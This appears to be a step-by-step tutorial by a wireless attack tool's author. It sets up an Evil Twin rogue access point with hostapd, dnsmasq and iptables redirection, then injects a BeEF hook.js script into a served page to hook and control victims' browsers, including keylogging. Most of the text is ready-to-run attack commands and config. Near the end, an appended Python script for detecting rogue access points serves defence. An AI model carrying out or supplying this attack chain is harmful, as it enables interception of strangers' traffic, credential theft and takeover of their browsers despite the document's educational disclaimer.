Hello all,
I'm the author of Infernal Wireless Suite. Today, I'd like to teach you how to perform an Evil Twin attack, along with utilizing the BeEF Framework to compromise a target machine during penetration tests or red team exercises.
First thing first, what is an Evil Twin attack?
An Evil Twin attack is when you impersonate a wireless access point and lure probing devices into connecting to you. You then act as a legitimate access point and provide internet access through your own upstream interface. Any victim connected to your fake access point is subject to data interception. More information can be found here: https://en.wikipedia.org/wiki/Evil_twin_(wireless_networks)
Second, what is the BeEF Framework?
BeEF (Browser Exploitation Framework) is a penetration testing tool focused on the web browser. It hooks a browser by getting its JavaScript payload executed in page content, typically through XSS or content manipulation, and then lets the operator control the hooked browser, run a keystroke logger and much more. You can find more information here: http://beefproject.com/
Now, as the title implies, I'd like to show you one of the attack vectors I implemented in my tool, Infernal Wireless, and how to do it manually.
Warning:
This tutorial is only for educational and professional use.
Please don't use it for illegal purposes!!
Note:
My network cards are as follows:
wlan0 - wireless interface name; yours might be different, replace if needed
eth0 - internet-facing interface name; yours might be different, replace if needed
Prerequisites:
Preferred OS: Kali Linux
Install: hostapd, dnsmasq, BeEF Framework
First, we need to create a fake Access Point with a desired name.
Step 1: Create a configuration file for hostapd
Type the following into free_AP.conf and save it (hostapd does not accept trailing comments on a line, so the comments sit on their own lines):
# wireless interface; change this if it differs from yours
interface=wlan0
driver=nl80211
# your access point name; no WPA settings are given, so this is an open network
ssid=<fakeAPName>
channel=1
Execute:
hostapd free_AP.conf &
Step 2: Configure DNS Settings:
From a command prompt, execute below:
# only needed if you start hostapd through the init script instead of the command above; the path must match where you saved the config
sed -i 's#^DAEMON_CONF=.*#DAEMON_CONF=/etc/hostapd/hostapd.conf#' /etc/init.d/hostapd
cat <<EOF > /etc/dnsmasq.conf
log-facility=/var/log/dnsmasq.log
#address=/#/10.0.0.1
#address=/google.com/10.0.0.1
# this is your wireless interface, change if different
interface=wlan0
dhcp-range=10.0.0.10,10.0.0.250,12h
# option 3 = default gateway, option 6 = DNS server; both point clients at this host
dhcp-option=3,10.0.0.1
dhcp-option=6,10.0.0.1
#no-resolv
log-queries
EOF
Execute:
service dnsmasq start
Step 3 - Set up NAT table:
Execute the following from the command line:
ifconfig wlan0 up
ifconfig wlan0 10.0.0.1/24
iptables -t nat -F
iptables -F
iptables -t nat -A POSTROUTING -o eth0 -j MASQUERADE
iptables -A FORWARD -i wlan0 -o eth0 -j ACCEPT
echo '1' > /proc/sys/net/ipv4/ip_forward
Step 4 - Set up BeEF and HTTP Service:
From command line or by any other means you have, enable HTTP Service:
/etc/init.d/apache2 start
Create index.html under your web root, i.e. /var/www/html/index.html, with the code below:
<html>
<body>
<script src="http://10.0.0.1:3000/hook.js"></script>
</body>
</html>
Step 5 - Another iptables setup:
# same MASQUERADE rule as in Step 3; harmless to repeat
iptables --table nat --append POSTROUTING --out-interface eth0 -j MASQUERADE
# the original had at0 here, which is airbase-ng's interface; with hostapd the AP interface is wlan0
iptables --append FORWARD --in-interface wlan0 -j ACCEPT
# redirect plain HTTP from clients on wlan0 to the local web server; -i wlan0 keeps the rule off traffic arriving on eth0
iptables -t nat -A PREROUTING -i wlan0 -p tcp --dport 80 -j DNAT --to-destination 10.0.0.1:80
iptables -t nat -A POSTROUTING -j MASQUERADE
Step 6 - Launch BeEF Framework:
From the command prompt, execute this:
firefox http://127.0.0.1:3000/ui/panel &
Login credentials are beef:beef
Now, it's just a matter of waiting till someone connects to your network.
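Seen from the defender's side, the setup above broadcasts a chosen SSID from an open access point whose BSSID is not one of the organisation's own. The following is an added example, my code rather than part of this tutorial or the Infernal Wireless Suite: it parses constructed `iw dev wlan0 scan` output (the `BSS`, `freq`, `capability` and `SSID` fields) and flags BSSIDs advertising a known SSID that are not on an allowlist, plus open clones of a protected SSID. The SSIDs, BSSIDs and allowlist are made-up values.

```python
import re

# Constructed sample of `iw dev wlan0 scan` output (not a real capture). Real
# output indents fields with tabs; the parser strips either tabs or spaces.
SAMPLE_SCAN = """\
BSS 00:11:22:33:44:55(on wlan0)
    freq: 2437
    capability: ESS Privacy (0x0411)
    SSID: CorpWiFi
BSS aa:bb:cc:dd:ee:ff(on wlan0)
    freq: 2412
    capability: ESS (0x0401)
    SSID: CorpWiFi
"""

# Allowlist of the organisation's own access points (constructed values).
KNOWN_APS = {"CorpWiFi": {"bssids": {"00:11:22:33:44:55"}, "encrypted": True}}

def parse_scan(text):
    """Parse `iw ... scan` output into a list of access-point records."""
    aps, cur = [], None
    for line in text.splitlines():
        m = re.match(r"BSS ([0-9a-f:]{17})", line)
        if m:
            cur = {"bssid": m.group(1), "ssid": None, "freq": None, "encrypted": False}
            aps.append(cur)
        elif cur is not None:
            field = line.strip()
            if field.startswith("SSID: "):
                cur["ssid"] = field[6:]
            elif field.startswith("freq: "):
                cur["freq"] = int(field[6:])
            elif field.startswith("capability:") and "Privacy" in field:
                # Privacy bit set means WEP/WPA/WPA2; an open AP leaves it clear.
                cur["encrypted"] = True
    return aps

def find_evil_twins(aps, known):
    """Return (bssid, ssid, freq, reason) for APs advertising a known SSID
    from a BSSID that is not on the allowlist."""
    findings = []
    for ap in aps:
        net = known.get(ap["ssid"])
        if net is None or ap["bssid"] in net["bssids"]:
            continue
        reason = "unknown BSSID for known SSID"
        if net["encrypted"] and not ap["encrypted"]:
            reason += "; open network cloning a protected SSID"
        findings.append((ap["bssid"], ap["ssid"], ap["freq"], reason))
    return findings
```

Run it against live output with `parse_scan(subprocess.check_output(["iw", "dev", "wlan0", "scan"], text=True))` and alert on any non-empty result.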
The demo video can be seen here: https://www.youtube.com/watch?v=pVY5azLJMPY
Now, wait. If you want to use the automated tool that I created, you can download it here: https://github.com/entropy1337/infernal-twin
Thank you